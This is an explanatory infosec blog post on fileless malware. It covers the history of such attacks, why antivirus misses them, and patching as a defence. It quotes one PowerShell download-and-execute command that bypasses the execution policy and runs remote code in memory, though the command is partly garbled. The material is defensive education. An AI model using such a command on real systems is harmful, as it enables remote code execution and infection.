Malware analysis

Decoding Fileless Malware

November 24, 2017 by Jayanthi

InfoSec professionals are constantly bombarded with ingenious ways of attacks in the connected and disconnected world. One such type of attack that is slowly regaining ground is the ‘fileless malware.’

“Malware” or “Malicious software” the broad umbrella term encompassing viruses, worms, Trojan, ransomware and even more malicious elements are present since the dawn of computer age. Malware authors find new and innovative ways to make sure that the malware that they create goes undetected and for a longer period. The sole idea behind most malware is to extort money and inflict maximum monetary and psychological damage. The “fileless malware” can do all that a traditional malware can do – but it is more difficult to identify since it is “fileless.” Ransomware, creating backdoors, stealing credentials – anything can be achieved with the “fileless malware“.

Having seen this, let us see how fileless malware works and how it is different from traditional malware.

History of Fileless malware:

Even though the very term ‘Fileless malware’ seemed to be making headlines in the year 2015, this type of malware has been present since the beginning of the 21st century. The notorious Code Red worm (2001) and the SQL slammer (2003) were notably the earliest discoveries of the ‘fileless malware.’ The Lurk banker Trojan, Powerliks, Angler, Phase Bot are examples of fileless malware that have played havoc in recent times. (The History of Fileless Malware – Looking Beyond the Buzzword)

The working of typical anti-virus (AV) software:

Before we see how fileless malware works, let us take a quick peek into the traditional anti-virus software. With each passing year, as new viruses and new varieties of malware are detected, anti-virus authors and security angels, are burdened with the responsibility to create products to thwart them. The traditional anti-virus software works on five techniques:

  1. Signature-based analysis
  2. Heuristic-based analysis
  3. Behavior-based analysis:

In addition to these techniques, we also have the ‘Sandbox analysis’ and ‘Data mining analysis,’ to detect viruses.

With genius minds at work to create viruses, no one technique might be effective to tackle viruses and not the ‘fileless malware.’ Let us see why the anti-virus technique fails at capturing fileless malware.

What is fileless malware and why is it difficult to detect it?

The ‘Fileless’ malware as the name specifies, is a type of malware that does not use any files in the process of infecting the system. In short, it does not download any files onto the hard disk. Unlike other types of malware, where the files are tampered with, this one sits silently and creates havoc on a trigger.

The payload here is directly installed on the system’s RAM, Windows registry and other hard to find places. It propagates itself by means of the scripts. The traditional anti-virus software works by comparing signatures to the malware present on the hard disk. Since fileless malware avoids this by injecting itself into the RAM or the Windows registry and does not create a presence on the hard disk, no anti-virus solution can detect it.

One crucial point here is that since the malware exists only in the RAM, it dies immediately once the system is rebooted or shutdown. The malware does all its mischievous tricks till the system is up and running. Moreover, since most systems these days are up and running for most of the time, the ‘fileless’ malware can go about doing its malicious activities for most of the time.

Persistence of the ‘fileless malware’ can be created if it injects itself into the Windows registry.

Damage from fileless malware:

So, what is the problem, one might think since it is not using any files? Well, even though it does not use any files, fileless malware can:

  1. Execute a hidden command against the very system it is on
  2. Create backdoors in the system to infiltrate it
  3. Leave network traces
  4. Exploit a vulnerability present in the system
  5. Continually monitor the machine for the time it is alive

How is it created?

Exploit kits are the primary way, in which fileless malware is created. Exploit kits are used to find vulnerabilities in web servers and exploit them.

Exploit-kits-as-a-service is a new kind of service that is used to create this type of malware, and the Angler exploit kit is one popular example.

How does an attack take place?

For a determined hacker or a group of individuals, executing an attack might involve devising different strategies. Some of the strategies might follow the traditional malware attack or the new fileless malware attack. We will discuss the working of the traditional malware and fileless malware below:

  1. Now the traditional means of infecting a system with malware happens when an unsuspecting user downloads a file onto their system from a link or website. The file which is downloaded onto the hard disk will then be screened by anti-virus solutions to determine if it is infected or not. If the file is determined to be infected, it is quarantined, else it is safe to be executed.
  2. Fileless malware/ransomware makes use of PowerShell, command shell or JavaScript or any other attack vector. One popular way of executing fileless attack involves the ‘PowerShell.’

    The PowerShell is an open source powerful scripting engine. Built on the .NET framework, PowerShell is primarily created for system administrators to automate operating system tasks and commands. It has a command line which is leveraged for performing fileless attacks.

    For a keen programmer, the fileless attack itself can take place very quickly with a few lines of code. Here is the way it proceeds:

    1. User clicks on a link on a malicious website or interacts with a website.
    2. PowerShell is spawned, and it launches an attack.
    3. The PowerShell will normally have a few lines of embedded mischievous code.

      powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient). DownloadString (Fileless Malware Execution with PowerShell is Easier than You May Realize)

      ‘PowerShell execution restriction’ can easily be bypassed by the ‘Bypass’ command by the attacker. Also, the above command downloads the malware from a malicious website remotely and executes it.

As we can see from the above few lines, this code will invoke a website (the command and control server) which will execute the malware.

This code is entirely run in memory, and nothing is written to the disk. (Fileless Malware Demystified)

Image credit:

How to protect oneself from these Fileless infections:

The primary reason why the ‘fileless malware’ is gaining much ground today is the fact that it penetrates a clean system using any trusted application with vulnerabilities. Microsoft Word macros, Microsoft PowerShell utility, browser plugins, Adobe PDF reader are all examples of software whose vulnerabilities can be used to launch fileless attacks. (What is a fileless attack? How hackers invade systems without installing software, 2017) Not applying patches and updates can leave one at the mercy of this new attack.

Hence, one necessary way to protect against fileless malware is to apply all security updates as and when they become available. Another way is to block pages that host the malicious exploit kit. (Understanding Fileless Malware Infections – The Full Guide)

We have seen fileless malware, why it is hard to be detected and how to protect oneself against the malware in this article. As security ninjas, it is vital to keep an eye on newer malware and continuously work towards fighting it.


Fileless Malware Demystified. (n.d.). Retrieved from YouTube:

Fileless Malware Execution with PowerShell is Easier than You May Realize. (n.d.). Retrieved from McAfee:

The History of Fileless Malware – Looking Beyond the Buzzword. (n.d.). Retrieved from Zelster Security Corp:

Understanding Fileless Malware Infections – The Full Guide. (n.d.). Retrieved from Heimdal Security:

What is a fileless attack? How hackers invade systems without installing software. (2017, October 9). Retrieved from CSO:

Posted: November 24, 2017
View Profile

Jayanthi Manikandan has an undergrad degree in Computer Science and a Master’s degree in Information Systems with a specialization in Information Assurance from Walsh College, Detroit, MI. She has donned several caps in her career as Java trainer, Oracle technology trainer, Java author, InfoSec blogger. With a passion for Information Security, she is currently ‘Security author’ for multiple organizations.